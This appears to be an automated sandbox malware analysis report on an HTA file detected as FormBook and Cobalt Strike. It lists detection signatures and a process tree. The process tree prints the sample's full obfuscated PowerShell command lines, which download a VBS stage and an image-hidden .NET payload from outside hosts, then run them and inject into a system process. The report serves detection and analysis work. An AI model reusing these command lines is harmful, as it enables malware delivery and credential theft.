Edit tour
Windows
Analysis Report
seemybestdayguvenu.hta
Overview
General Information
| Sample name: | seemybestdayguvenu.hta |
| Analysis ID: | 1570658 |
| MD5: | 3af71b8154d01f56072abd20b3a40b1d |
| SHA1: | 81ec9438c1e189024d85c5418b2bdf8a16577ee4 |
| SHA256: | dd8410b74d1b3249b8459fea6a43997ad653a8aa2d7aabb02f20076270d34b50 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, FormBook, HTMLPhisher
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 1372 cmdline: mshta.exe "C:\Users\ user\Deskt op\seemybe stdayguven u.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 2836 cmdline: "C:\Window s\system32 \cmd.exe" "/C poweRs hElL.Exe -ex bypaSs -nOp -w 1 -c DE viCECrEdEn TIALDePLOY MENT.ExE ; INvoKe-eX PrESSioN($ (INVOKe-EX PressION(' [syStEm.te xt.eNCodin G]'+[cHar] 58+[ChAr]0 x3A+'Utf8. GEtSTrInG( [SYsteM.cO nvErT]'+[C haR]58+[Ch aR]0X3A+'f roMbAsE64s trinG('+[C har]34+'JH N2ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICA9ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBh REQtVFlwRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLU1FbUJF UmRFZklOaV RJT24gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICdb RGxsSW1wb3 J0KCJ1ckxN T04uRExMIi wgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IExlU3ZOR3 Z3YWtaLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgcW JFcyxzdHJp bmcgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEhLbW pGVFRlLHVp bnQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGcsSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBt VGtaVXFXVG 53KTsnICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt TmFNZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIk dUIiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLW5B TUVTUEFDZS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbXcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1Q YXNzVGhydT sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICRzdjo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzE3 Mi4yNDUuMT IzLjI5Lzc3 MC9zZWVteW Jlc3R0aGlu Z3N3aGF0ZG 9pbmdmb3Ji ZXR0ZXIudE lGIiwiJEVu djpBUFBEQV RBXHNlZW15 YmVzdHRoaW 5nc3doYXRk b2luZ2Zvcm JlLnZiUyIs MCwwKTtTVE FSVC1TTGVl UCgzKTtpSS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIiRlTlY6 QVBQREFUQV xzZWVteWJl c3R0aGluZ3 N3aGF0ZG9p bmdmb3JiZS 52YlMi'+[c HAr]34+')) ')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 6600 cmdline: poweRshElL .Exe -ex bypaSs -nOp -w 1 -c DEviC ECrEdEnTIA LDePLOYMEN T.ExE ; IN voKe-eXPrE SSioN($(IN VOKe-EXPre ssION('[sy StEm.text. eNCodinG]' +[cHar]58+ [ChAr]0x3A +'Utf8.GEt STrInG([SY steM.cOnvE rT]'+[ChaR ]58+[ChaR] 0X3A+'froM bAsE64stri nG('+[Char ]34+'JHN2I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBhREQ tVFlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1FbUJFUmR FZklOaVRJT 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICdbRGx sSW1wb3J0K CJ1ckxNT04 uRExMIiwgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEx lU3ZOR3Z3Y WtaLHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgcWJFc yxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEhLbWpGV FRlLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGcsSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBtVGt aVXFXVG53K TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTmF NZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIkdUI iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5BTUV TUEFDZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgb XcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1QYXN zVGhydTsgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRzdjo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE3Mi4 yNDUuMTIzL jI5Lzc3MC9 zZWVteWJlc 3R0aGluZ3N 3aGF0ZG9pb mdmb3JiZXR 0ZXIudElGI iwiJEVudjp BUFBEQVRBX HNlZW15YmV zdHRoaW5nc 3doYXRkb2l uZ2ZvcmJlL nZiUyIsMCw wKTtTVEFSV C1TTGVlUCg zKTtpSSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRlTlY6QVB QREFUQVxzZ WVteWJlc3R 0aGluZ3N3a GF0ZG9pbmd mb3JiZS52Y lMi'+[cHAr ]34+'))')) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 4540 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\3cxbggpe \3cxbggpe. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 5724 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SA8D6.tmp" "c:\Users \user\AppD ata\Local\ Temp\3cxbg gpe\CSC280 B62266E034 82F8F906ED B13385254. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
wscript.exe (PID: 5552 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seemy bestthings whatdoingf orbe.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 3004 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $doctor = 'JGJlaSA9I CdodHRwczo vL3Jlcy5jb G91ZGluYXJ 5LmNvbS9ke XRmbHQ2MW4 vaW1hZ2Uvd XBsb2FkL3Y xNzMzMTM0O TQ3L2JrbHB 5c2V5ZXV0N GltcHc1MG4 xLmpwZyAnO yRhbW9uaWV taWEgPSBOZ XctT2JqZWN 0IFN5c3Rlb S5OZXQuV2V iQ2xpZW50O yRxdWFscXV lciA9ICRhb W9uaWVtaWE uRG93bmxvY WREYXRhKCR iZWkpOyRhd GVycmFnZW0 gPSBbU3lzd GVtLlRleHQ uRW5jb2Rpb mddOjpVVEY 4LkdldFN0c mluZygkcXV hbHF1ZXIpO yRsZWlyaWE gPSAnPDxCQ VNFNjRfU1R BUlQ+Pic7J GFjYXBuYSA 9ICc8PEJBU 0U2NF9FTkQ +Pic7JGluc XVpZXR1ZGU gPSAkYXRlc nJhZ2VtLkl uZGV4T2YoJ GxlaXJpYSk 7JHBlY3Rhc iA9ICRhdGV ycmFnZW0uS W5kZXhPZig kYWNhcG5hK TskaW5xdWl ldHVkZSAtZ 2UgMCAtYW5 kICRwZWN0Y XIgLWd0ICR pbnF1aWV0d WRlOyRpbnF 1aWV0dWRlI Cs9ICRsZWl yaWEuTGVuZ 3RoOyRjb25 kaWNlbnRlI D0gJHBlY3R hciAtICRpb nF1aWV0dWR lOyRuaWNvb GF0byA9ICR hdGVycmFnZ W0uU3Vic3R yaW5nKCRpb nF1aWV0dWR lLCAkY29uZ GljZW50ZSk 7JG1hZHJpb GhlaXJhID0 gLWpvaW4gK CRuaWNvbGF 0by5Ub0NoY XJBcnJheSg pIHwgRm9yR WFjaC1PYmp lY3QgeyAkX yB9KVstMS4 uLSgkbmljb 2xhdG8uTGV uZ3RoKV07J GNyZWR1bGl kYWRlID0gW 1N5c3RlbS5 Db252ZXJ0X To6RnJvbUJ hc2U2NFN0c mluZygkbWF kcmlsaGVpc mEpOyRyZWR pemltYXIgP SBbU3lzdGV tLlJlZmxlY 3Rpb24uQXN zZW1ibHldO jpMb2FkKCR jcmVkdWxpZ GFkZSk7JHJ lYmVsbGFkb 3IgPSBbZG5 saWIuSU8uS G9tZV0uR2V 0TWV0aG9kK CdWQUknKTs kcmViZWxsY WRvci5JbnZ va2UoJG51b GwsIEAoJ3R 4dC5BQ01BQ y8wNzcvOTI uMzIxLjU0M i4yNzEvLzp wdHRoJywgJ yRyYXBhZG8 nLCAnJHJhc GFkbycsICc kcmFwYWRvJ ywgJ2FzcG5 ldF9jb21wa WxlcicsICc kcmFwYWRvJ ywgJyRyYXB hZG8nLCckc mFwYWRvJyw nJHJhcGFkb ycsJyRyYXB hZG8nLCckc mFwYWRvJyw nJHJhcGFkb ycsJzEnLCc kcmFwYWRvJ ykpOw==';$ theatrelho = [System .Text.Enco ding]::UTF 8.GetStrin g([System. Convert]:: FromBase64 String($do ctor));Inv oke-Expres sion $thea trelho MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - aspnet_compiler.exe (PID: 4976 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||